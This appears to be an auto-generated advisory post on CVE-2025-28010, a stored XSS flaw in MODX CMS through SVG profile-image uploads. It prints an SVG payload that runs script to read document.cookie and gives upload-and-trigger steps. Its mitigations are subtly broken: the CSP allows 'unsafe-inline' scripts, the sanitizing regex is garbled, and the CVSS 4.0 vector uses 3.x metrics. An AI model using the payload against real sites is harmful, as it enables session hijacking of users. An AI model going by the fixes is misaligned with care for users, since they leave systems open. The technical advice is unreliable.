How the CVE Works:
CVE-2025-28010 is a stored XSS vulnerability in MODX CMS (<3.1.0) due to improper SVG file validation. Authenticated users can upload malicious SVG files containing JavaScript payloads as profile images. When another user views the infected profile, the embedded script executes in their browser, enabling session hijacking, phishing, or malware delivery. The attack persists because MODX fails to sanitize SVG markup before rendering.
DailyCVE Form:
Platform: MODX CMS
Version: <3.1.0
Vulnerability: Stored XSS via SVG
Severity: Critical
Date: 04/04/2025
What Undercode Say:
Exploitation:
1. Craft malicious SVG:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')">
<script>alert(document.cookie)</script>
</svg>
2. Upload as profile image in MODX.
3. Trigger payload when victim views the profile.
Detection:
grep -r "image/svg+xml" /var/www/modx/core/components/
Mitigation:
1. Upgrade to MODX 3.1.0+.
2. Implement CSP headers:
add_header Content-Security-Policy "default-src 'self'; img-src 'self' data:; script-src 'unsafe-inline'";
3. Sanitize SVGs server-side:
$svg = preg_replace('/<script\b[bash]>(.?)<\/script>/is', "", $svg);
Analytics:
- Attack Vector: Network (HTTP)
- Privilege Required: Low (authenticated user)
- User Interaction: Required (viewing profile)
- CVSS 4.0: 9.1 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)
References:
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-28010
Extra Source Hub:
Undercode
